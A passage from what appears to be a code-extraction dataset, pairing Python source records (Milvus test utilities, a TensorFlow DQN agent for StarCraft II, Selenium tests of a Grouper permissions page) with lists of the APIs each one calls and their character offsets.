y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.count_nonzero(x)
def modify_file(file_path_list, is_modify=False, input_content=""):
"""
file_path_list : file list -> list[<file_path>]
is_modify : does the file need to be reset
input_content :the content that need to insert to the file
"""
if not isinstance(file_path_list, list):
log.error("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
log.debug("[modify_file] folder(%s) is not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
log.error("[modify_file] file(%s) is not exist." % file_path)
else:
if is_modify is True:
log.debug("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
log.info("[modify_file] file(%s) modification is complete." % file_path_list)
def index_to_dict(index):
return {
"collection_name": index.collection_name,
"field_name": index.field_name,
# "name": index.name,
"params": index.params
}
def assert_equal_index(index_1, index_2):
return index_to_dict(index_1) == index_to_dict(index_2)
def gen_partitions(collection_w, partition_num=1):
"""
target: create extra partitions except for _default
method: create more than one partitions
expected: return collection and raw data
"""
log.info("gen_partitions: creating partitions")
for i in range(partition_num):
partition_name = "search_partition_" + str(i)
collection_w.create_partition(partition_name=partition_name,
description="search partition")
par = collection_w.partitions
assert len(par) == (partition_num + 1)
log.info("gen_partitions: created partitions %s" % par)
def insert_data(collection_w, nb=3000, is_binary=False):
"""
target: insert non-binary/binary data
method: insert non-binary/binary data into partitions if any
expected: return collection and raw data
"""
par = collection_w.partitions
num = len(par)
vectors = []
binary_raw_vectors = []
log.info("insert_data: inserting data into collection %s (num_entities: %s)"
% (collection_w.name, nb))
for i in range(num):
if is_binary:
default_data, binary_raw_data = gen_default_binary_dataframe_data(nb // num)
binary_raw_vectors.extend(binary_raw_data)
else:
default_data = gen_default_dataframe_data(nb // num)
collection_w.insert(default_data, par[i].name)
vectors.append(default_data)
log.info("insert_data: inserted data into collection %s (num_entities: %s)"
% (collection_w.name, nb))
return collection_w, vectors, binary_raw_vectors
|
[
"numpy.bitwise_xor",
"utils.util_log.test_log.error",
"os.path.isfile",
"numpy.arange",
"base.schema_wrapper.ApiFieldSchemaWrapper",
"numpy.bitwise_or",
"pandas.DataFrame",
"base.schema_wrapper.ApiCollectionSchemaWrapper",
"random.randint",
"utils.util_log.test_log.debug",
"utils.util_log.test_log.info",
"numpy.asarray",
"numpy.packbits",
"random.random",
"sklearn.preprocessing.normalize",
"numpy.count_nonzero",
"os.makedirs",
"os.path.isdir",
"numpy.float32",
"random.choice",
"numpy.array",
"numpy.bitwise_and",
"os.path.split",
"pymilvus_orm.types.DataType.__members__.items"
] |
[((3773, 3824), 'sklearn.preprocessing.normalize', 'preprocessing.normalize', (['vectors'], {'axis': '(1)', 'norm': '"""l2"""'}), "(vectors, axis=1, norm='l2')\n", (3796, 3824), False, 'from sklearn import preprocessing\n'), ((4483, 4641), 'pandas.DataFrame', 'pd.DataFrame', (['{ct.default_int64_field_name: int_values, ct.default_float_field_name:\n float_values, ct.default_float_vec_field_name: float_vec_values}'], {}), '({ct.default_int64_field_name: int_values, ct.\n default_float_field_name: float_values, ct.default_float_vec_field_name:\n float_vec_values})\n', (4495, 4641), True, 'import pandas as pd\n'), ((5013, 5174), 'pandas.DataFrame', 'pd.DataFrame', (['{ct.default_int64_field_name: int_values, ct.default_float_field_name:\n float_values, ct.default_binary_vec_field_name: binary_vec_values}'], {}), '({ct.default_int64_field_name: int_values, ct.\n default_float_field_name: float_values, ct.\n default_binary_vec_field_name: binary_vec_values})\n', (5025, 5174), True, 'import pandas as pd\n'), ((5855, 5883), 'numpy.arange', 'np.arange', (['nb'], {'dtype': '"""int64"""'}), "(nb, dtype='int64')\n", (5864, 5883), True, 'import numpy as np\n'), ((5903, 5933), 'numpy.arange', 'np.arange', (['nb'], {'dtype': '"""float32"""'}), "(nb, dtype='float32')\n", (5912, 5933), True, 'import numpy as np\n'), ((6968, 6996), 'pymilvus_orm.types.DataType.__members__.items', 'DataType.__members__.items', ([], {}), '()\n', (6994, 6996), False, 'from pymilvus_orm.types import DataType\n'), ((7516, 7538), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7526, 7538), True, 'import numpy as np\n'), ((7547, 7569), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7557, 7569), True, 'import numpy as np\n'), ((7691, 7713), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7701, 7713), True, 'import numpy as np\n'), ((7722, 7744), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7732, 7744), True, 'import numpy as np\n'), ((7813, 7835), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7823, 7835), True, 'import numpy as np\n'), ((7844, 7866), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7854, 7866), True, 'import numpy as np\n'), ((7999, 8021), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (8009, 8021), True, 'import numpy as np\n'), ((8030, 8052), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (8040, 8052), True, 'import numpy as np\n'), ((8164, 8186), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (8174, 8186), True, 'import numpy as np\n'), ((8195, 8217), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (8205, 8217), True, 'import numpy as np\n'), ((9942, 9989), 'utils.util_log.test_log.info', 'log.info', (['"""gen_partitions: creating partitions"""'], {}), "('gen_partitions: creating partitions')\n", (9950, 9989), True, 'from utils.util_log import test_log as log\n'), ((10299, 10354), 'utils.util_log.test_log.info', 'log.info', (["('gen_partitions: created partitions %s' % par)"], {}), "('gen_partitions: created partitions %s' % par)\n", (10307, 10354), True, 'from utils.util_log import test_log as log\n'), ((10684, 10797), 'utils.util_log.test_log.info', 'log.info', (["('insert_data: inserting data into collection %s (num_entities: %s)' % (\n collection_w.name, nb))"], {}), "(\n 'insert_data: inserting data into collection %s (num_entities: %s)' % (\n collection_w.name, nb))\n", (10692, 10797), True, 'from utils.util_log import test_log as log\n'), ((11167, 11273), 'utils.util_log.test_log.info', 'log.info', (["('insert_data: inserted data into collection %s (num_entities: %s)' % (\n collection_w.name, nb))"], {}), "('insert_data: inserted data into collection %s (num_entities: %s)' %\n (collection_w.name, nb))\n", (11175, 11273), True, 'from utils.util_log import test_log as log\n'), ((5355, 5368), 'numpy.float32', 'np.float32', (['i'], {}), '(i)\n', (5365, 5368), True, 'import numpy as np\n'), ((6184, 6197), 'numpy.float32', 'np.float32', (['i'], {}), '(i)\n', (6194, 6197), True, 'import numpy as np\n'), ((8594, 8640), 'utils.util_log.test_log.error', 'log.error', (['"""[modify_file] file is not a list."""'], {}), "('[modify_file] file is not a list.')\n", (8603, 8640), True, 'from utils.util_log import test_log as log\n'), ((8712, 8736), 'os.path.split', 'os.path.split', (['file_path'], {}), '(file_path)\n', (8725, 8736), False, 'import os\n'), ((418, 429), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (426, 429), True, 'import numpy as np\n'), ((432, 443), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (440, 443), True, 'import numpy as np\n'), ((504, 555), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (517, 555), False, 'import random\n'), ((708, 759), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (721, 759), False, 'import random\n'), ((919, 942), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (940, 942), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((1263, 1286), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (1284, 1286), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((1653, 1676), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (1674, 1676), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2138, 2161), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (2159, 2161), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2657, 2685), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (2683, 2685), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2998, 3026), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (3024, 3026), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((3437, 3465), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (3463, 3465), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((3702, 3717), 'random.random', 'random.random', ([], {}), '()\n', (3715, 3717), False, 'import random\n'), ((3981, 4001), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (3995, 4001), False, 'import random\n'), ((7756, 7776), 'numpy.bitwise_xor', 'np.bitwise_xor', (['x', 'y'], {}), '(x, y)\n', (7770, 7776), True, 'import numpy as np\n'), ((8108, 8127), 'numpy.count_nonzero', 'np.count_nonzero', (['y'], {}), '(y)\n', (8124, 8127), True, 'import numpy as np\n'), ((8273, 8292), 'numpy.count_nonzero', 'np.count_nonzero', (['x'], {}), '(x)\n', (8289, 8292), True, 'import numpy as np\n'), ((8752, 8778), 'os.path.isdir', 'os.path.isdir', (['folder_path'], {}), '(folder_path)\n', (8765, 8778), False, 'import os\n'), ((8792, 8857), 'utils.util_log.test_log.debug', 'log.debug', (["('[modify_file] folder(%s) is not exist.' % folder_path)"], {}), "('[modify_file] folder(%s) is not exist.' % folder_path)\n", (8801, 8857), True, 'from utils.util_log import test_log as log\n'), ((8870, 8894), 'os.makedirs', 'os.makedirs', (['folder_path'], {}), '(folder_path)\n', (8881, 8894), False, 'import os\n'), ((8911, 8936), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (8925, 8936), False, 'import os\n'), ((8950, 9011), 'utils.util_log.test_log.error', 'log.error', (["('[modify_file] file(%s) is not exist.' % file_path)"], {}), "('[modify_file] file(%s) is not exist.' % file_path)\n", (8959, 9011), True, 'from utils.util_log import test_log as log\n'), ((9076, 9142), 'utils.util_log.test_log.debug', 'log.debug', (["('[modify_file] start modifying file(%s)...' % file_path)"], {}), "('[modify_file] start modifying file(%s)...' % file_path)\n", (9085, 9142), True, 'from utils.util_log import test_log as log\n'), ((9344, 9421), 'utils.util_log.test_log.info', 'log.info', (["('[modify_file] file(%s) modification is complete.' % file_path_list)"], {}), "('[modify_file] file(%s) modification is complete.' % file_path_list)\n", (9352, 9421), True, 'from utils.util_log import test_log as log\n'), ((7055, 7078), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (7076, 7078), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((4098, 4130), 'numpy.packbits', 'np.packbits', (['raw_vector'], {'axis': '(-1)'}), '(raw_vector, axis=-1)\n', (4109, 4130), True, 'import numpy as np\n'), ((7595, 7615), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (7609, 7615), True, 'import numpy as np\n'), ((7635, 7654), 'numpy.bitwise_or', 'np.bitwise_or', (['x', 'y'], {}), '(x, y)\n', (7648, 7654), True, 'import numpy as np\n'), ((8078, 8098), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (8092, 8098), True, 'import numpy as np\n'), ((8243, 8263), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (8257, 8263), True, 'import numpy as np\n'), ((7897, 7917), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (7911, 7917), True, 'import numpy as np\n'), ((7937, 7956), 'numpy.bitwise_or', 'np.bitwise_or', (['x', 'y'], {}), '(x, y)\n', (7950, 7956), True, 'import numpy as np\n')]
|
import datetime
import os
from collections import deque
import random
import numpy as np
import tensorflow as tf
import pysc2.agents.myAgent.myAgent_6.config.config as config
from pysc2.agents.myAgent.myAgent_6.net.lenet import Lenet
class DQN():
def __init__(self, mu, sigma, learning_rate, actiondim, parameterdim, statedim, name): # 初始化
# 初始化回放缓冲区,用REPLAY_SIZE定义其最大长度
self.replay_buffer = deque(maxlen=config.REPLAY_SIZE)
# 神经网络参数
self.mu = mu
self.sigma = sigma
self.learning_rate = learning_rate
self.time_step = 0
self.epsilon = config.INITIAL_EPSILON
# 动作维度数,动作参数维度数(默认为6),状态维度数
self.action_dim = actiondim
self.parameterdim = parameterdim
self.state_dim = statedim
# 网络结构初始化
self.name = name
self.net = Lenet(self.mu, self.sigma, self.learning_rate, self.action_dim, self.parameterdim, self.state_dim, self.name)
# Init session
self.session = tf.InteractiveSession()
self.session.run(tf.initialize_all_variables())
self.modelSaver = tf.train.Saver()
self.recordSaver = None
self.recordCount = 0
self.restoreModelMark = True
def restoreModel(self, modelLoadPath):
self.modelSaver.restore(self.session, modelLoadPath + '/' + self.name + '.ckpt')
def saveModel(self, modelSavePath, episode):
if episode % config.MODEL_SAVE_EPISODE == 0:
thisPath = modelSavePath + 'episode_' + str(episode) + '/'
try:
os.makedirs(thisPath)
except OSError:
pass
self.modelSaver.save(self.session, thisPath + self.name + '.ckpt', )
def saveRecord(self, modelSavePath, data):
if self.recordSaver is None:
thisPath = modelSavePath
self.recordSaver = tf.summary.FileWriter(thisPath, self.session.graph)
data_summary = tf.Summary(value=[tf.Summary.Value(tag=self.name + '_' + "loss", simple_value=data)])
self.recordSaver.add_summary(summary=data_summary, global_step=self.recordCount)
self.recordCount += 1
def perceive(self, state, action, reward, next_state, done): # 感知存储信息
one_hot_action = np.zeros(self.action_dim + self.parameterdim, dtype=np.float32)
one_hot_action[int(action[0])] = 1
if self.parameterdim != 0:
one_hot_action[self.action_dim:] = action[1:]
state = np.squeeze(state)
next_state = np.squeeze(next_state)
self.replay_buffer.append([state, one_hot_action, reward, next_state, done])
def train_Q_network(self, modelSavePath, episode): # 训练网络
if len(self.replay_buffer) > config.BATCH_SIZE:
for mark in range(config.LOOP):
minibatch = random.sample(self.replay_buffer, config.BATCH_SIZE)
state_batch = np.array([data[0] for data in minibatch])
action_batch = np.array([data[1] for data in minibatch])
reward_batch = np.array([data[2] for data in minibatch])
next_state_batch = np.array([data[3] for data in minibatch])
# Step 2: calculate y
y_batch = np.array([])
Q_value_batch = np.array(self.session.run(self.net.Q_value, {self.net.state_input: next_state_batch}))
for i in range(0, config.BATCH_SIZE):
done = minibatch[i][4]
if done:
temp = np.append(np.array(reward_batch[i]), np.array(Q_value_batch[i][self.action_dim:]))
temp = temp.reshape((1, 1 + self.parameterdim))
y_batch = np.append(y_batch, temp)
else:
temp = np.append(np.array(reward_batch[i] + config.GAMMA * np.max(Q_value_batch[i][0:self.action_dim])),
Q_value_batch[i][self.action_dim:])
temp = temp.reshape((1, 1 + self.parameterdim))
y_batch = np.append(y_batch, temp)
y_batch = np.array(y_batch).reshape(config.BATCH_SIZE, 1 + self.parameterdim)
_, loss = self.session.run([self.net.train_op, self.net.loss],
feed_dict={self.net.y_input: y_batch,
self.net.action_input: action_batch,
self.net.state_input: state_batch})
self.saveRecord(modelSavePath, loss)
self.saveModel(modelSavePath, episode)
def egreedy_action(self, state): # 输出带随机的动作
Q_value = self.session.run(self.net.Q_value, {self.net.state_input: state})[0]
# self.epsilon -= (config.INITIAL_EPSILON - config.FINAL_EPSILON) / 10000
if np.random.uniform() <= self.epsilon:
random_action = np.random.randint(0, self.action_dim)
random_parameter = np.random.rand(self.parameterdim)
random_action_and_parameter = np.append(random_action, random_parameter).flatten()
return random_action_and_parameter
else:
action = np.argmax(Q_value[0:self.action_dim])
parameter = np.array(Q_value[self.action_dim:(self.action_dim + self.parameterdim)])
action_and_parameter = np.append(action, parameter).flatten()
return action_and_parameter
def action(self, state, modelLoadPath):
if self.restoreModelMark == True and modelLoadPath is not None:
self.restoreModelMark = False
self.restoreModel(modelLoadPath)
print(self.name + 'read!')
Q_value = self.session.run(self.net.Q_value, {self.net.state_input: state})[0]
action = np.argmax(Q_value[0:self.action_dim])
parameter = np.array(Q_value[self.action_dim:(self.action_dim + self.parameterdim)])
action_and_parameter = np.append(action, parameter)
return action_and_parameter
|
[
"numpy.random.uniform",
"os.makedirs",
"tensorflow.train.Saver",
"numpy.argmax",
"numpy.random.rand",
"random.sample",
"numpy.zeros",
"numpy.append",
"pysc2.agents.myAgent.myAgent_6.net.lenet.Lenet",
"tensorflow.summary.FileWriter",
"numpy.array",
"numpy.random.randint",
"tensorflow.initialize_all_variables",
"tensorflow.Summary.Value",
"tensorflow.InteractiveSession",
"numpy.max",
"numpy.squeeze",
"collections.deque"
] |
[((418, 450), 'collections.deque', 'deque', ([], {'maxlen': 'config.REPLAY_SIZE'}), '(maxlen=config.REPLAY_SIZE)\n', (423, 450), False, 'from collections import deque\n'), ((845, 959), 'pysc2.agents.myAgent.myAgent_6.net.lenet.Lenet', 'Lenet', (['self.mu', 'self.sigma', 'self.learning_rate', 'self.action_dim', 'self.parameterdim', 'self.state_dim', 'self.name'], {}), '(self.mu, self.sigma, self.learning_rate, self.action_dim, self.\n parameterdim, self.state_dim, self.name)\n', (850, 959), False, 'from pysc2.agents.myAgent.myAgent_6.net.lenet import Lenet\n'), ((1002, 1025), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (1023, 1025), True, 'import tensorflow as tf\n'), ((1109, 1125), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1123, 1125), True, 'import tensorflow as tf\n'), ((2252, 2315), 'numpy.zeros', 'np.zeros', (['(self.action_dim + self.parameterdim)'], {'dtype': 'np.float32'}), '(self.action_dim + self.parameterdim, dtype=np.float32)\n', (2260, 2315), True, 'import numpy as np\n'), ((2468, 2485), 'numpy.squeeze', 'np.squeeze', (['state'], {}), '(state)\n', (2478, 2485), True, 'import numpy as np\n'), ((2507, 2529), 'numpy.squeeze', 'np.squeeze', (['next_state'], {}), '(next_state)\n', (2517, 2529), True, 'import numpy as np\n'), ((5801, 5838), 'numpy.argmax', 'np.argmax', (['Q_value[0:self.action_dim]'], {}), '(Q_value[0:self.action_dim])\n', (5810, 5838), True, 'import numpy as np\n'), ((5859, 5929), 'numpy.array', 'np.array', (['Q_value[self.action_dim:self.action_dim + self.parameterdim]'], {}), '(Q_value[self.action_dim:self.action_dim + self.parameterdim])\n', (5867, 5929), True, 'import numpy as np\n'), ((5963, 5991), 'numpy.append', 'np.append', (['action', 'parameter'], {}), '(action, parameter)\n', (5972, 5991), True, 'import numpy as np\n'), ((1051, 1080), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (1078, 1080), True, 'import tensorflow as tf\n'), ((1870, 1921), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['thisPath', 'self.session.graph'], {}), '(thisPath, self.session.graph)\n', (1891, 1921), True, 'import tensorflow as tf\n'), ((4857, 4876), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (4874, 4876), True, 'import numpy as np\n'), ((4922, 4959), 'numpy.random.randint', 'np.random.randint', (['(0)', 'self.action_dim'], {}), '(0, self.action_dim)\n', (4939, 4959), True, 'import numpy as np\n'), ((4991, 5024), 'numpy.random.rand', 'np.random.rand', (['self.parameterdim'], {}), '(self.parameterdim)\n', (5005, 5024), True, 'import numpy as np\n'), ((5203, 5240), 'numpy.argmax', 'np.argmax', (['Q_value[0:self.action_dim]'], {}), '(Q_value[0:self.action_dim])\n', (5212, 5240), True, 'import numpy as np\n'), ((5265, 5335), 'numpy.array', 'np.array', (['Q_value[self.action_dim:self.action_dim + self.parameterdim]'], {}), '(Q_value[self.action_dim:self.action_dim + self.parameterdim])\n', (5273, 5335), True, 'import numpy as np\n'), ((1565, 1586), 'os.makedirs', 'os.makedirs', (['thisPath'], {}), '(thisPath)\n', (1576, 1586), False, 'import os\n'), ((2809, 2861), 'random.sample', 'random.sample', (['self.replay_buffer', 'config.BATCH_SIZE'], {}), '(self.replay_buffer, config.BATCH_SIZE)\n', (2822, 2861), False, 'import random\n'), ((2892, 2933), 'numpy.array', 'np.array', (['[data[0] for data in minibatch]'], {}), '([data[0] for data in minibatch])\n', (2900, 2933), True, 'import numpy as np\n'), ((2965, 3006), 'numpy.array', 'np.array', (['[data[1] for data in minibatch]'], {}), '([data[1] for data in minibatch])\n', (2973, 3006), True, 'import numpy as np\n'), ((3038, 3079), 'numpy.array', 'np.array', (['[data[2] for data in minibatch]'], {}), '([data[2] for data in minibatch])\n', (3046, 3079), True, 'import numpy as np\n'), ((3115, 3156), 'numpy.array', 'np.array', (['[data[3] for data in minibatch]'], {}), '([data[3] for data in minibatch])\n', (3123, 3156), True, 'import numpy as np\n'), ((3222, 3234), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (3230, 3234), True, 'import numpy as np\n'), ((1964, 2029), 'tensorflow.Summary.Value', 'tf.Summary.Value', ([], {'tag': "(self.name + '_' + 'loss')", 'simple_value': 'data'}), "(tag=self.name + '_' + 'loss', simple_value=data)\n", (1980, 2029), True, 'import tensorflow as tf\n'), ((5067, 5109), 'numpy.append', 'np.append', (['random_action', 'random_parameter'], {}), '(random_action, random_parameter)\n', (5076, 5109), True, 'import numpy as np\n'), ((5373, 5401), 'numpy.append', 'np.append', (['action', 'parameter'], {}), '(action, parameter)\n', (5382, 5401), True, 'import numpy as np\n'), ((3701, 3725), 'numpy.append', 'np.append', (['y_batch', 'temp'], {}), '(y_batch, temp)\n', (3710, 3725), True, 'import numpy as np\n'), ((4064, 4088), 'numpy.append', 'np.append', (['y_batch', 'temp'], {}), '(y_batch, temp)\n', (4073, 4088), True, 'import numpy as np\n'), ((4115, 4132), 'numpy.array', 'np.array', (['y_batch'], {}), '(y_batch)\n', (4123, 4132), True, 'import numpy as np\n'), ((3522, 3547), 'numpy.array', 'np.array', (['reward_batch[i]'], {}), '(reward_batch[i])\n', (3530, 3547), True, 'import numpy as np\n'), ((3549, 3593), 'numpy.array', 'np.array', (['Q_value_batch[i][self.action_dim:]'], {}), '(Q_value_batch[i][self.action_dim:])\n', (3557, 3593), True, 'import numpy as np\n'), ((3835, 3878), 'numpy.max', 'np.max', (['Q_value_batch[i][0:self.action_dim]'], {}), '(Q_value_batch[i][0:self.action_dim])\n', (3841, 3878), True, 'import numpy as np\n')]
|
from datetime import datetime
from time import time
from typing import TYPE_CHECKING
from grouper.constants import PERMISSION_CREATE
from grouper.entities.permission import Permission
from grouper.fe.template_util import print_date
from itests.pages.permissions import PermissionsPage
from itests.setup import frontend_server
from tests.url_util import url
if TYPE_CHECKING:
from py.path import LocalPath
from selenium.webdriver import Chrome
from tests.setup import SetupTest
from typing import List
def create_test_data(setup):
# type: (SetupTest) -> List[Permission]
"""Sets up a very basic test graph and returns the permission objects.
Be careful not to include milliseconds in the creation timestamps since this causes different
behavior on SQLite (which preserves them) and MySQL (which drops them).
"""
early_date = datetime.utcfromtimestamp(1)
now_minus_one_second = datetime.utcfromtimestamp(int(time() - 1))
now = datetime.utcfromtimestamp(int(time()))
permissions = [
Permission(name="first-permission", description="first", created_on=now_minus_one_second),
Permission(name="audited-permission", description="", created_on=now),
Permission(name="early-permission", description="is early", created_on=early_date),
]
with setup.transaction():
for permission in permissions:
setup.create_permission(
name=permission.name,
description=permission.description,
created_on=permission.created_on,
audited=(permission.name == "audited-permission"),
)
setup.create_permission("disabled", enabled=False)
setup.create_user("<EMAIL>")
return permissions
def test_list(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
permissions = create_test_data(setup)
expected_permissions = [(p.name, p.description, print_date(p.created_on)) for p in permissions]
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions"))
# Check the basic permission list.
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)
assert page.heading == "Permissions"
assert page.subheading == "{} permission(s)".format(len(expected_permissions))
assert page.limit_label == "Limit: 100"
# Switch to only audited permissions.
page.click_show_audited_button()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
audited = [p for p in expected_permissions if p[0] == "audited-permission"]
assert seen_permissions == sorted(audited)
assert page.heading == "Audited Permissions"
assert page.subheading == "{} permission(s)".format(len(audited))
# Switch back to all permissions and sort by date.
page.click_show_all_button()
page.click_sort_by_date()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
expected_permissions_sorted_by_time = [
(p.name, p.description, print_date(p.created_on))
for p in sorted(permissions, key=lambda p: p.created_on, reverse=True)
]
assert seen_permissions == expected_permissions_sorted_by_time
# Reverse the sort order.
page.click_sort_by_date()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == list(reversed(expected_permissions_sorted_by_time))
def test_list_pagination(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
"""Test pagination.
This forces the pagination to specific values, rather than using the page controls, since we
don't create more than 100 permissions for testing.
"""
permissions = create_test_data(setup)
expected_permissions = [(p.name, p.description, print_date(p.created_on)) for p in permissions]
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions?limit=1&offset=1"))
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)[1:2]
assert page.limit_label == "Limit: 1"
# Retrieve the last permission but with a larger limit to test that the limit isn't capped
# to the number of returned items.
browser.get(url(frontend_url, "/permissions?limit=10&offset=2"))
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)[2:]
assert page.limit_label == "Limit: 10"
def test_create_button(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
with setup.transaction():
setup.create_user("<EMAIL>")
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions"))
page = PermissionsPage(browser)
assert not page.has_create_permission_button
with setup.transaction():
setup.grant_permission_to_group(PERMISSION_CREATE, "*", "admins")
setup.add_user_to_group("<EMAIL>", "admins")
browser.get(url(frontend_url, "/permissions?refresh=yes"))
assert page.has_create_permission_button
|
[
"itests.pages.permissions.PermissionsPage",
"grouper.fe.template_util.print_date",
"time.time",
"datetime.datetime.utcfromtimestamp",
"itests.setup.frontend_server",
"tests.url_util.url",
"grouper.entities.permission.Permission"
] |
[((869, 897), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['(1)'], {}), '(1)\n', (894, 897), False, 'from datetime import datetime\n'), ((1045, 1139), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""first-permission"""', 'description': '"""first"""', 'created_on': 'now_minus_one_second'}), "(name='first-permission', description='first', created_on=\n now_minus_one_second)\n", (1055, 1139), False, 'from grouper.entities.permission import Permission\n'), ((1144, 1213), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""audited-permission"""', 'description': '""""""', 'created_on': 'now'}), "(name='audited-permission', description='', created_on=now)\n", (1154, 1213), False, 'from grouper.entities.permission import Permission\n'), ((1223, 1310), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""early-permission"""', 'description': '"""is early"""', 'created_on': 'early_date'}), "(name='early-permission', description='is early', created_on=\n early_date)\n", (1233, 1310), False, 'from grouper.entities.permission import Permission\n'), ((2003, 2037), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (2018, 2037), False, 'from itests.setup import frontend_server\n'), ((2169, 2193), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (2184, 2193), False, 'from itests.pages.permissions import PermissionsPage\n'), ((4177, 4211), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (4192, 4211), False, 'from itests.setup import frontend_server\n'), ((4316, 4340), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (4331, 4340), False, 'from itests.pages.permissions import PermissionsPage\n'), ((4784, 4808), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (4799, 4808), False, 'from itests.pages.permissions import PermissionsPage\n'), ((5199, 5233), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (5214, 5233), False, 'from itests.setup import frontend_server\n'), ((5321, 5345), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (5336, 5345), False, 'from itests.pages.permissions import PermissionsPage\n'), ((1008, 1014), 'time.time', 'time', ([], {}), '()\n', (1012, 1014), False, 